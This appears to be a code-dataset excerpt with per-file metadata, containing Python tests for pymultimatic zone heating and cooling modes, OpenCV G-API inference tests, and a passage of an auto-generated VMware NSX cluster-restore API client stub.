f4029bdd7d043b9d9f6411da13596535c89c077b
|
[
"MIT"
] | 7
|
2020-08-03T08:44:18.000Z
|
2022-02-27T10:15:46.000Z
|
import unittest
from pymultimatic.model import ActiveFunction, OperatingModes, SettingModes, Zone, ZoneCooling
from tests.conftest import _time_program, _zone, _zone_cooling
class ZoneTest(unittest.TestCase):
def test_get_active_mode_night(self) -> None:
zone = _zone()
zone.heating.operating_mode = OperatingModes.NIGHT
active_mode = zone.active_mode
self.assertEqual(OperatingModes.NIGHT, active_mode.current)
self.assertEqual(zone.heating.target_low, active_mode.target)
self.assertIsNone(active_mode.sub)
def test_get_active_mode_day(self) -> None:
zone = _zone()
zone.heating.operating_mode = OperatingModes.DAY
active_mode = zone.active_mode
self.assertEqual(OperatingModes.DAY, active_mode.current)
self.assertEqual(zone.heating.target_high, active_mode.target)
self.assertIsNone(active_mode.sub)
def test_get_active_mode_off(self) -> None:
zone = _zone()
zone.heating.operating_mode = OperatingModes.OFF
active_mode = zone.active_mode
self.assertEqual(OperatingModes.OFF, active_mode.current)
self.assertEqual(Zone.MIN_TARGET_HEATING_TEMP, active_mode.target)
self.assertIsNone(active_mode.sub)
def test_cooling_active_mode_auto(self) -> None:
cooling = ZoneCooling()
cooling.operating_mode = OperatingModes.AUTO
cooling.time_program = _time_program()
active_mode = cooling.active_mode
self.assertEqual(OperatingModes.AUTO, active_mode.current)
self.assertEqual(SettingModes.ON, active_mode.sub)
def test_cooling_active_mode_auto_off(self) -> None:
cooling = ZoneCooling()
cooling.operating_mode = OperatingModes.AUTO
cooling.time_program = _time_program(mode=SettingModes.OFF)
active_mode = cooling.active_mode
self.assertEqual(OperatingModes.AUTO, active_mode.current)
self.assertEqual(SettingModes.OFF, active_mode.sub)
def test_cooling_active_mode_on(self) -> None:
cooling = ZoneCooling()
cooling.operating_mode = OperatingModes.ON
cooling.time_program = _time_program()
active_mode = cooling.active_mode
self.assertEqual(OperatingModes.ON, active_mode.current)
self.assertIsNone(active_mode.sub)
def test_cooling_active_mode_off(self) -> None:
cooling = ZoneCooling()
cooling.operating_mode = OperatingModes.OFF
cooling.time_program = _time_program()
active_mode = cooling.active_mode
self.assertEqual(OperatingModes.OFF, active_mode.current)
self.assertIsNone(active_mode.sub)
def test_get_active_mode_cooling_auto(self) -> None:
zone = _zone_cooling()
active_mode = zone.active_mode
self.assertEqual(OperatingModes.AUTO, active_mode.current)
self.assertEqual(zone.cooling.target_high, active_mode.target)
self.assertEqual(SettingModes.ON, active_mode.sub)
def test_get_active_mode_standby_cooling(self) -> None:
zone = _zone_cooling()
zone.active_function = ActiveFunction.STANDBY
active_mode = zone.active_mode
self.assertEqual(OperatingModes.AUTO, active_mode.current)
self.assertEqual(zone.cooling.target_high, active_mode.target)
self.assertEqual(SettingModes.ON, active_mode.sub)
def test_get_active_mode_standby_heating(self) -> None:
zone = _zone()
zone.active_function = ActiveFunction.STANDBY
active_mode = zone.active_mode
self.assertEqual(OperatingModes.AUTO, active_mode.current)
self.assertEqual(zone.heating.target_high, active_mode.target)
self.assertEqual(SettingModes.DAY, active_mode.sub)
| 38.742268
| 94
| 0.720596
| 436
| 3,758
| 5.908257
| 0.098624
| 0.217391
| 0.054348
| 0.09705
| 0.885093
| 0.852096
| 0.846273
| 0.846273
| 0.734084
| 0.627329
| 0
| 0
| 0.196647
| 3,758
| 96
| 95
| 39.145833
| 0.853263
| 0
| 0
| 0.630137
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.356164
| 1
| 0.136986
| false
| 0
| 0.041096
| 0
| 0.191781
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db048f57866c20de5d25e3ee58fbcd5c7eca1c55
| 13,628
|
py
|
Python
|
modules/gapi/misc/python/test/test_gapi_infer.py
|
jiangjiajun/opencv
|
1fb3133ec5bedfc2733dca44e2c92e6feb8092e5
|
[
"Apache-2.0"
] | 14
|
2017-11-08T08:19:33.000Z
|
2021-08-02T20:29:38.000Z
|
modules/gapi/misc/python/test/test_gapi_infer.py
|
jiangjiajun/opencv
|
1fb3133ec5bedfc2733dca44e2c92e6feb8092e5
|
[
"Apache-2.0"
] | 362
|
2017-06-05T02:34:37.000Z
|
2021-12-10T03:26:23.000Z
|
modules/gapi/misc/python/test/test_gapi_infer.py
|
jiangjiajun/opencv
|
1fb3133ec5bedfc2733dca44e2c92e6feb8092e5
|
[
"Apache-2.0"
] | 17
|
2017-06-07T02:11:50.000Z
|
2020-06-01T13:55:41.000Z
|
#!/usr/bin/env python
import numpy as np
import cv2 as cv
import os
from tests_common import NewOpenCVTests
class test_gapi_infer(NewOpenCVTests):
def infer_reference_network(self, model_path, weights_path, img):
net = cv.dnn.readNetFromModelOptimizer(model_path, weights_path)
net.setPreferableBackend(cv.dnn.DNN_BACKEND_INFERENCE_ENGINE)
net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)
blob = cv.dnn.blobFromImage(img)
net.setInput(blob)
return net.forward(net.getUnconnectedOutLayersNames())
def make_roi(self, img, roi):
return img[roi[1]:roi[1] + roi[3], roi[0]:roi[0] + roi[2], ...]
def test_age_gender_infer(self):
# NB: Check IE
if not cv.dnn.DNN_TARGET_CPU in cv.dnn.getAvailableTargets(cv.dnn.DNN_BACKEND_INFERENCE_ENGINE):
return
root_path = '/omz_intel_models/intel/age-gender-recognition-retail-0013/FP32/age-gender-recognition-retail-0013'
model_path = self.find_file(root_path + '.xml', [os.environ.get('OPENCV_DNN_TEST_DATA_PATH')])
weights_path = self.find_file(root_path + '.bin', [os.environ.get('OPENCV_DNN_TEST_DATA_PATH')])
device_id = 'CPU'
img_path = self.find_file('cv/face/david2.jpg', [os.environ.get('OPENCV_TEST_DATA_PATH')])
img = cv.resize(cv.imread(img_path), (62,62))
# OpenCV DNN
dnn_age, dnn_gender = self.infer_reference_network(model_path, weights_path, img)
# OpenCV G-API
g_in = cv.GMat()
inputs = cv.GInferInputs()
inputs.setInput('data', g_in)
outputs = cv.gapi.infer("net", inputs)
age_g = outputs.at("age_conv3")
gender_g = outputs.at("prob")
comp = cv.GComputation(cv.GIn(g_in), cv.GOut(age_g, gender_g))
pp = cv.gapi.ie.params("net", model_path, weights_path, device_id)
gapi_age, gapi_gender = comp.apply(cv.gin(img), args=cv.compile_args(cv.gapi.networks(pp)))
# Check
self.assertEqual(0.0, cv.norm(dnn_gender, gapi_gender, cv.NORM_INF))
self.assertEqual(0.0, cv.norm(dnn_age, gapi_age, cv.NORM_INF))
def test_age_gender_infer_roi(self):
# NB: Check IE
if not cv.dnn.DNN_TARGET_CPU in cv.dnn.getAvailableTargets(cv.dnn.DNN_BACKEND_INFERENCE_ENGINE):
return
root_path = '/omz_intel_models/intel/age-gender-recognition-retail-0013/FP32/age-gender-recognition-retail-0013'
model_path = self.find_file(root_path + '.xml', [os.environ.get('OPENCV_DNN_TEST_DATA_PATH')])
weights_path = self.find_file(root_path + '.bin', [os.environ.get('OPENCV_DNN_TEST_DATA_PATH')])
device_id = 'CPU'
img_path = self.find_file('cv/face/david2.jpg', [os.environ.get('OPENCV_TEST_DATA_PATH')])
img = cv.imread(img_path)
roi = (10, 10, 62, 62)
# OpenCV DNN
dnn_age, dnn_gender = self.infer_reference_network(model_path,
weights_path,
self.make_roi(img, roi))
# OpenCV G-API
g_in = cv.GMat()
g_roi = cv.GOpaqueT(cv.gapi.CV_RECT)
inputs = cv.GInferInputs()
inputs.setInput('data', g_in)
outputs = cv.gapi.infer("net", g_roi, inputs)
age_g = outputs.at("age_conv3")
gender_g = outputs.at("prob")
comp = cv.GComputation(cv.GIn(g_in, g_roi), cv.GOut(age_g, gender_g))
pp = cv.gapi.ie.params("net", model_path, weights_path, device_id)
gapi_age, gapi_gender = comp.apply(cv.gin(img, roi), args=cv.compile_args(cv.gapi.networks(pp)))
# Check
self.assertEqual(0.0, cv.norm(dnn_gender, gapi_gender, cv.NORM_INF))
self.assertEqual(0.0, cv.norm(dnn_age, gapi_age, cv.NORM_INF))
def test_age_gender_infer_roi_list(self):
# NB: Check IE
if not cv.dnn.DNN_TARGET_CPU in cv.dnn.getAvailableTargets(cv.dnn.DNN_BACKEND_INFERENCE_ENGINE):
return
root_path = '/omz_intel_models/intel/age-gender-recognition-retail-0013/FP32/age-gender-recognition-retail-0013'
model_path = self.find_file(root_path + '.xml', [os.environ.get('OPENCV_DNN_TEST_DATA_PATH')])
weights_path = self.find_file(root_path + '.bin', [os.environ.get('OPENCV_DNN_TEST_DATA_PATH')])
device_id = 'CPU'
rois = [(10, 15, 62, 62), (23, 50, 62, 62), (14, 100, 62, 62), (80, 50, 62, 62)]
img_path = self.find_file('cv/face/david2.jpg', [os.environ.get('OPENCV_TEST_DATA_PATH')])
img = cv.imread(img_path)
# OpenCV DNN
dnn_age_list = []
dnn_gender_list = []
for roi in rois:
age, gender = self.infer_reference_network(model_path,
weights_path,
self.make_roi(img, roi))
dnn_age_list.append(age)
dnn_gender_list.append(gender)
# OpenCV G-API
g_in = cv.GMat()
g_rois = cv.GArrayT(cv.gapi.CV_RECT)
inputs = cv.GInferInputs()
inputs.setInput('data', g_in)
outputs = cv.gapi.infer("net", g_rois, inputs)
age_g = outputs.at("age_conv3")
gender_g = outputs.at("prob")
comp = cv.GComputation(cv.GIn(g_in, g_rois), cv.GOut(age_g, gender_g))
pp = cv.gapi.ie.params("net", model_path, weights_path, device_id)
gapi_age_list, gapi_gender_list = comp.apply(cv.gin(img, rois),
args=cv.compile_args(cv.gapi.networks(pp)))
# Check
for gapi_age, gapi_gender, dnn_age, dnn_gender in zip(gapi_age_list,
gapi_gender_list,
dnn_age_list,
dnn_gender_list):
self.assertEqual(0.0, cv.norm(dnn_gender, gapi_gender, cv.NORM_INF))
self.assertEqual(0.0, cv.norm(dnn_age, gapi_age, cv.NORM_INF))
def test_age_gender_infer2_roi(self):
# NB: Check IE
if not cv.dnn.DNN_TARGET_CPU in cv.dnn.getAvailableTargets(cv.dnn.DNN_BACKEND_INFERENCE_ENGINE):
return
root_path = '/omz_intel_models/intel/age-gender-recognition-retail-0013/FP32/age-gender-recognition-retail-0013'
model_path = self.find_file(root_path + '.xml', [os.environ.get('OPENCV_DNN_TEST_DATA_PATH')])
weights_path = self.find_file(root_path + '.bin', [os.environ.get('OPENCV_DNN_TEST_DATA_PATH')])
device_id = 'CPU'
rois = [(10, 15, 62, 62), (23, 50, 62, 62), (14, 100, 62, 62), (80, 50, 62, 62)]
img_path = self.find_file('cv/face/david2.jpg', [os.environ.get('OPENCV_TEST_DATA_PATH')])
img = cv.imread(img_path)
# OpenCV DNN
dnn_age_list = []
dnn_gender_list = []
for roi in rois:
age, gender = self.infer_reference_network(model_path,
weights_path,
self.make_roi(img, roi))
dnn_age_list.append(age)
dnn_gender_list.append(gender)
# OpenCV G-API
g_in = cv.GMat()
g_rois = cv.GArrayT(cv.gapi.CV_RECT)
inputs = cv.GInferListInputs()
inputs.setInput('data', g_rois)
outputs = cv.gapi.infer2("net", g_in, inputs)
age_g = outputs.at("age_conv3")
gender_g = outputs.at("prob")
comp = cv.GComputation(cv.GIn(g_in, g_rois), cv.GOut(age_g, gender_g))
pp = cv.gapi.ie.params("net", model_path, weights_path, device_id)
gapi_age_list, gapi_gender_list = comp.apply(cv.gin(img, rois),
args=cv.compile_args(cv.gapi.networks(pp)))
# Check
for gapi_age, gapi_gender, dnn_age, dnn_gender in zip(gapi_age_list,
gapi_gender_list,
dnn_age_list,
dnn_gender_list):
self.assertEqual(0.0, cv.norm(dnn_gender, gapi_gender, cv.NORM_INF))
self.assertEqual(0.0, cv.norm(dnn_age, gapi_age, cv.NORM_INF))
def test_person_detection_retail_0013(self):
# NB: Check IE
if not cv.dnn.DNN_TARGET_CPU in cv.dnn.getAvailableTargets(cv.dnn.DNN_BACKEND_INFERENCE_ENGINE):
return
root_path = '/omz_intel_models/intel/person-detection-retail-0013/FP32/person-detection-retail-0013'
model_path = self.find_file(root_path + '.xml', [os.environ.get('OPENCV_DNN_TEST_DATA_PATH')])
weights_path = self.find_file(root_path + '.bin', [os.environ.get('OPENCV_DNN_TEST_DATA_PATH')])
img_path = self.find_file('gpu/lbpcascade/er.png', [os.environ.get('OPENCV_TEST_DATA_PATH')])
device_id = 'CPU'
img = cv.resize(cv.imread(img_path), (544, 320))
# OpenCV DNN
net = cv.dnn.readNetFromModelOptimizer(model_path, weights_path)
net.setPreferableBackend(cv.dnn.DNN_BACKEND_INFERENCE_ENGINE)
net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)
blob = cv.dnn.blobFromImage(img)
def parseSSD(detections, size):
h, w = size
bboxes = []
detections = detections.reshape(-1, 7)
for sample_id, class_id, confidence, xmin, ymin, xmax, ymax in detections:
if confidence >= 0.5:
x = int(xmin * w)
y = int(ymin * h)
width = int(xmax * w - x)
height = int(ymax * h - y)
bboxes.append((x, y, width, height))
return bboxes
net.setInput(blob)
dnn_detections = net.forward()
dnn_boxes = parseSSD(np.array(dnn_detections), img.shape[:2])
# OpenCV G-API
g_in = cv.GMat()
inputs = cv.GInferInputs()
inputs.setInput('data', g_in)
g_sz = cv.gapi.streaming.size(g_in)
outputs = cv.gapi.infer("net", inputs)
detections = outputs.at("detection_out")
bboxes = cv.gapi.parseSSD(detections, g_sz, 0.5, False, False)
comp = cv.GComputation(cv.GIn(g_in), cv.GOut(bboxes))
pp = cv.gapi.ie.params("net", model_path, weights_path, device_id)
gapi_age, gapi_gender = comp.apply(cv.gin(img), args=cv.compile_args(cv.gapi.networks(pp)))
gapi_boxes = comp.apply(cv.gin(img.astype(np.float32)),
args=cv.compile_args(cv.gapi.networks(pp)))
# Comparison
self.assertEqual(0.0, cv.norm(np.array(dnn_boxes).flatten(),
np.array(gapi_boxes).flatten(),
cv.NORM_INF))
def test_person_detection_retail_0013(self):
# NB: Check IE
if not cv.dnn.DNN_TARGET_CPU in cv.dnn.getAvailableTargets(cv.dnn.DNN_BACKEND_INFERENCE_ENGINE):
return
root_path = '/omz_intel_models/intel/person-detection-retail-0013/FP32/person-detection-retail-0013'
model_path = self.find_file(root_path + '.xml', [os.environ.get('OPENCV_DNN_TEST_DATA_PATH')])
weights_path = self.find_file(root_path + '.bin', [os.environ.get('OPENCV_DNN_TEST_DATA_PATH')])
img_path = self.find_file('gpu/lbpcascade/er.png', [os.environ.get('OPENCV_TEST_DATA_PATH')])
device_id = 'CPU'
img = cv.resize(cv.imread(img_path), (544, 320))
# OpenCV DNN
net = cv.dnn.readNetFromModelOptimizer(model_path, weights_path)
net.setPreferableBackend(cv.dnn.DNN_BACKEND_INFERENCE_ENGINE)
net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)
blob = cv.dnn.blobFromImage(img)
def parseSSD(detections, size):
h, w = size
bboxes = []
detections = detections.reshape(-1, 7)
for sample_id, class_id, confidence, xmin, ymin, xmax, ymax in detections:
if confidence >= 0.5:
x = int(xmin * w)
y = int(ymin * h)
width = int(xmax * w - x)
height = int(ymax * h - y)
bboxes.append((x, y, width, height))
return bboxes
net.setInput(blob)
dnn_detections = net.forward()
dnn_boxes = parseSSD(np.array(dnn_detections), img.shape[:2])
# OpenCV G-API
g_in = cv.GMat()
inputs = cv.GInferInputs()
inputs.setInput('data', g_in)
g_sz = cv.gapi.streaming.size(g_in)
outputs = cv.gapi.infer("net", inputs)
detections = outputs.at("detection_out")
bboxes = cv.gapi.parseSSD(detections, g_sz, 0.5, False, False)
comp = cv.GComputation(cv.GIn(g_in), cv.GOut(bboxes))
pp = cv.gapi.ie.params("net", model_path, weights_path, device_id)
gapi_boxes = comp.apply(cv.gin(img.astype(np.float32)),
args=cv.compile_args(cv.gapi.networks(pp)))
# Comparison
self.assertEqual(0.0, cv.norm(np.array(dnn_boxes).flatten(),
np.array(gapi_boxes).flatten(),
cv.NORM_INF))
if __name__ == '__main__':
NewOpenCVTests.bootstrap()
| 42.322981
| 123
| 0.580276
| 1,780
| 13,628
| 4.197191
| 0.091011
| 0.020078
| 0.040155
| 0.038549
| 0.946326
| 0.940035
| 0.940035
| 0.937224
| 0.934547
| 0.934547
| 0
| 0.022343
| 0.300484
| 13,628
| 321
| 124
| 42.454829
| 0.761355
| 0.021133
| 0
| 0.870968
| 0
| 0.02765
| 0.098836
| 0.077507
| 0
| 0
| 0
| 0
| 0.046083
| 1
| 0.046083
| false
| 0
| 0.018433
| 0.004608
| 0.115207
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db17f6bf7a9d7a02d5ab7761b5094fe666d599c5
| 22,293
|
py
|
Python
|
com/vmware/nsx/cluster/restore_client.py
|
vishal-12/vsphere-automation-sdk-python
|
9cf363971db77ea5a12928eecd5cf5170a7fcd8a
|
[
"MIT"
] | null | null | null |
com/vmware/nsx/cluster/restore_client.py
|
vishal-12/vsphere-automation-sdk-python
|
9cf363971db77ea5a12928eecd5cf5170a7fcd8a
|
[
"MIT"
] | null | null | null |
com/vmware/nsx/cluster/restore_client.py
|
vishal-12/vsphere-automation-sdk-python
|
9cf363971db77ea5a12928eecd5cf5170a7fcd8a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2019 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.nsx.cluster.restore.
#---------------------------------------------------------------------------
"""
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class Backuptimestamps(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.cluster.restore.backuptimestamps'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _BackuptimestampsStub)
def get(self,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns timestamps for all backup files that are available on the SFTP
server.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ClusterBackupInfoListResult`
:return: com.vmware.nsx.model.ClusterBackupInfoListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class Config(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.cluster.restore.config'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ConfigStub)
def get(self):
"""
Get configuration information for the file server used to store
backed-up files. Fields that contain secrets (password, passphrase) are
not returned.
:rtype: :class:`com.vmware.nsx.model_client.RestoreConfiguration`
:return: com.vmware.nsx.model.RestoreConfiguration
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get', None)
def update(self,
restore_configuration,
):
"""
Configure file server where the backed-up files used for the Restore
operation are available.
:type restore_configuration: :class:`com.vmware.nsx.model_client.RestoreConfiguration`
:param restore_configuration: (required)
:rtype: :class:`com.vmware.nsx.model_client.RestoreConfiguration`
:return: com.vmware.nsx.model.RestoreConfiguration
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'restore_configuration': restore_configuration,
})
class InstructionResources(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.cluster.restore.instruction_resources'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _InstructionResourcesStub)
def get(self,
instruction_id,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
For restore operations requiring user input e.g. performing an action,
accepting/rejecting an action, etc. the information to be conveyed to
users is provided in this call.
:type instruction_id: :class:`str`
:param instruction_id: Id of the instruction set whose instructions are to be returned
(required)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ActionableResourceListResult`
:return: com.vmware.nsx.model.ActionableResourceListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'instruction_id': instruction_id,
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class Status(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.cluster.restore.status'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _StatusStub)
def get(self):
"""
Returns status information for the specified NSX cluster restore
request.
:rtype: :class:`com.vmware.nsx.model_client.ClusterRestoreStatus`
:return: com.vmware.nsx.model.ClusterRestoreStatus
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get', None)
class _BackuptimestampsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/cluster/restore/backuptimestamps',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ClusterBackupInfoListResult'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.cluster.restore.backuptimestamps',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ConfigStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/cluster/restore/config',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'restore_configuration': type.ReferenceType('com.vmware.nsx.model_client', 'RestoreConfiguration'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/cluster/restore/config',
request_body_parameter='restore_configuration',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'RestoreConfiguration'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'RestoreConfiguration'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.cluster.restore.config',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _InstructionResourcesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'instruction_id': type.StringType(),
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
get_error_dict = {
